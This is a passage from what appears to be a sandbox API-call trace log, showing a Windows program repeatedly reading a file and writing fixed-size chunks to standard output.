nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] GetFileType (hFile=0x4c) returned 0x1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] GetFileType (hFile=0x4c) returned 0x1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] GetFileType (hFile=0x4c) returned 0x1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] GetFileType (hFile=0x4c) returned 0x1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] GetFileType (hFile=0x4c) returned 0x1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] GetFileType (hFile=0x4c) returned 0x1 [0098.637] _get_osfhandle (_FileHandle=1) returned 
0x4c [0098.637] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] GetFileType (hFile=0x4c) returned 0x1 [0098.637] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.637] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] GetFileType (hFile=0x4c) returned 0x1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.638] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.638] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.638] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.638] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] GetFileType (hFile=0x4c) returned 0x1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] GetFileType (hFile=0x4c) returned 0x1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) 
returned 1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] GetFileType (hFile=0x4c) returned 0x1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] GetFileType (hFile=0x4c) returned 0x1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] GetFileType (hFile=0x4c) returned 0x1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] GetFileType (hFile=0x4c) returned 0x1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] GetFileType (hFile=0x4c) returned 0x1 [0098.638] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.638] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.638] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0098.639] GetFileType (hFile=0x4c) returned 0x1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.639] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.639] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.639] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.639] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] GetFileType (hFile=0x4c) returned 0x1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] GetFileType (hFile=0x4c) returned 0x1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] GetFileType (hFile=0x4c) returned 0x1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] GetFileType (hFile=0x4c) returned 0x1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] GetFileType (hFile=0x4c) returned 0x1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] GetFileType (hFile=0x4c) returned 0x1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] GetFileType (hFile=0x4c) returned 0x1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.639] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.639] GetFileType (hFile=0x4c) returned 0x1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.640] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.640] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.640] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.640] ReadFile 
(in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] GetFileType (hFile=0x4c) returned 0x1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] GetFileType (hFile=0x4c) returned 0x1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] GetFileType (hFile=0x4c) returned 0x1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] GetFileType (hFile=0x4c) returned 0x1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] GetFileType (hFile=0x4c) returned 0x1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] GetFileType (hFile=0x4c) returned 0x1 [0098.640] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] GetFileType (hFile=0x4c) returned 0x1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.640] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.640] GetFileType (hFile=0x4c) returned 0x1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.641] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.641] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.641] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.641] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] GetFileType (hFile=0x4c) returned 0x1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] GetFileType (hFile=0x4c) returned 0x1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, 
lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] GetFileType (hFile=0x4c) returned 0x1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] GetFileType (hFile=0x4c) returned 0x1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] GetFileType (hFile=0x4c) returned 0x1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] GetFileType (hFile=0x4c) returned 0x1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] GetFileType (hFile=0x4c) returned 0x1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, 
lpOverlapped=0x0) returned 1 [0098.641] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.641] GetFileType (hFile=0x4c) returned 0x1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.642] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.642] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.642] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.642] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] GetFileType (hFile=0x4c) returned 0x1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] GetFileType (hFile=0x4c) returned 0x1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] GetFileType (hFile=0x4c) returned 0x1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] GetFileType (hFile=0x4c) returned 0x1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] WriteFile (in: hFile=0x4c, 
lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] GetFileType (hFile=0x4c) returned 0x1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] GetFileType (hFile=0x4c) returned 0x1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] GetFileType (hFile=0x4c) returned 0x1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.642] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.642] GetFileType (hFile=0x4c) returned 0x1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.643] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.643] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.643] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0098.643] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] GetFileType (hFile=0x4c) returned 0x1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] GetFileType (hFile=0x4c) returned 0x1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] WriteFile (in: hFile=0x4c, lpBuffer=0x30eb74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] GetFileType (hFile=0x4c) returned 0x1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] WriteFile (in: hFile=0x4c, lpBuffer=0x30ebc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ebc4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] GetFileType (hFile=0x4c) returned 0x1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec14*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] GetFileType (hFile=0x4c) returned 0x1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] WriteFile (in: hFile=0x4c, lpBuffer=0x30ec64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ec64*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] 
GetFileType (hFile=0x4c) returned 0x1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] WriteFile (in: hFile=0x4c, lpBuffer=0x30ecb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ecb4*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] GetFileType (hFile=0x4c) returned 0x1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed04*, lpNumberOfBytesWritten=0x30dd58*=0x50, lpOverlapped=0x0) returned 1 [0098.643] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.643] GetFileType (hFile=0x4c) returned 0x1 [0098.644] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.644] WriteFile (in: hFile=0x4c, lpBuffer=0x30ed54*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30dd58, lpOverlapped=0x0 | out: lpBuffer=0x30ed54*, lpNumberOfBytesWritten=0x30dd58*=0x20, lpOverlapped=0x0) returned 1 [0098.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.644] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.644] _get_osfhandle (_FileHandle=1) returned 0x4c [0098.644] GetFileType (hFile=0x4c) returned 0x1 [0098.644] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.644] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.644] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, 
